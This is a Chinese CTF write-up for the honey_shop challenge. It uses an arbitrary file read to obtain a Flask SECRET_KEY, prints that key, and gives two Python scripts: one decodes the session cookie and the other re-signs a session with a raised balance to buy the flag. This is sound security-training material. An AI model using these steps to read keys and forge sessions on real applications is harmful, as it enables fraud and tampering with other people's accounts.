BUU [PASECA2019]honey_shop
技术栈:任意文件读取、session伪造
开启靶机,我有1336金币,买flag需要1337金币
点击上面的大图,会直接下载图片
抓包看看,感觉是任意文件读取
修改下路径读一下
读到了session密钥是Kv8iQMoBRn0zhY6rgfcXSSbzNJVeY7KfbgsVmVa6
先把现有的session解密看看,发现金额就在里面,也就是说只要伪造session、把金额改掉就行。
脚本贴一下:
import base64
import json
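import zlib


def decode_flask_cookie(cookie):
    """Read the payload of a Flask session cookie without checking its signature.

    A Flask session cookie is an itsdangerous token of the form
    ``payload.timestamp.signature``: the payload is URL-safe base64 (padding
    stripped) of JSON, and a leading ``.`` on the whole token marks a
    zlib-compressed payload. The payload is signed, not encrypted, so it is
    readable by anyone holding the cookie; this function reads it and ignores
    the signature entirely.

    Args:
        cookie: the raw cookie value as sent by the browser.

    Returns:
        The decoded JSON value, normally the session ``dict``.

    Raises:
        ValueError: if the payload is missing or is not valid base64, zlib,
            UTF-8 or JSON.
    """
    compressed = cookie.startswith('.')
    if compressed:
        # itsdangerous prefixes the whole token with '.' when the payload is
        # compressed; without stripping it, split('.')[0] would be '' and the
        # compressed case could never decode.
        cookie = cookie[1:]
    encoded_payload = cookie.split('.')[0]
    if not encoded_payload:
        raise ValueError("Cookie has no payload segment")
    # The encoder strips '=' padding; restore it so the decoder accepts it.
    encoded_payload += '=' * (-len(encoded_payload) % 4)
    # binascii.Error raised here is a ValueError subclass, matching the contract.
    payload = base64.urlsafe_b64decode(encoded_payload)
    try:
        payload = zlib.decompress(payload)
    except zlib.error as err:
        if compressed:
            raise ValueError("Failed to decompress session data") from err
        # Unmarked tokens are expected to be plain JSON; keep the best-effort attempt.
    try:
        text = payload.decode('utf-8')
    except UnicodeDecodeError as err:
        raise ValueError("Failed to decode session data as UTF-8 string") from err
    # json.JSONDecodeError is itself a ValueError, so callers need only one except.
    return json.loads(text)


# Example usage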
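cookie = "eyJiYWxhbmNlIjoxMzM2LCJwdXJjaGFzZXMiOltdfQ.Zo11Hg.Q7xIJmOPmhsabu4gXmoppnLG9J8"
try:
    # Only the decode can raise ValueError; printing stays outside the try.
    decoded_data = decode_flask_cookie(cookie)
except ValueError as e:
    # Report the reason, not merely that decoding failed.
    print("Error decoding session data", e)
else:
    print(json.dumps(decoded_data, indent=4))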
拿密钥加密一下,脚本也贴下:
from flask.sessions import SecureCookieSessionInterface
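import ast


class MockApp(object):
    """Minimal stand-in for a Flask app, carrying only what the serializer reads."""

    def __init__(self, secret_key):
        self.secret_key = secret_key
        # NOTE(review): newer Flask releases also consult app.config inside
        # get_signing_serializer; an empty mapping keeps this mock usable
        # there. Confirm against the installed Flask version.
        self.config = {}


def encrypt_flask_session(secret_key, session_data):
    """Sign session data into a Flask session cookie using *secret_key*.

    The cookie is signed, not encrypted: the serializer only proves the
    cookie was produced by the holder of ``secret_key``, so the integrity of
    every session rests entirely on that key staying secret.

    Args:
        secret_key: the application's SECRET_KEY.
        session_data: the session as a dict, or its Python-literal string
            form (parsed with ast.literal_eval, so no code is executed).

    Returns:
        The signed cookie string.

    Raises:
        Exception: wrapping any parsing or signing error, message prefixed
            with ``[Encoding error]``; the original error is chained as the cause.
    """
    try:
        app = MockApp(secret_key)
        if isinstance(session_data, str):
            session_data = ast.literal_eval(session_data)
        session_data = dict(session_data)
        serializer = SecureCookieSessionInterface().get_signing_serializer(app)
        if serializer is None:
            # Flask returns None instead of a serializer when the key is empty,
            # which would otherwise surface as an AttributeError on .dumps.
            raise ValueError("secret_key must be a non-empty string")
        return serializer.dumps(session_data)
    except Exception as e:
        raise Exception(f"[Encoding error] {e}") from e


# Example usage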
session_data = "{'balance': 1339, 'purchases': []}"
secret_key = "Kv8iQMoBRn0zhY6rgfcXSSbzNJVeY7KfbgsVmVa6"  # replace with the Flask app's actual SECRET_KEY
try:
    # Any failure is surfaced by encrypt_flask_session as a wrapped Exception.
    encrypted_cookie = encrypt_flask_session(secret_key, session_data)
    print(encrypted_cookie)
except Exception as e:
    print(e)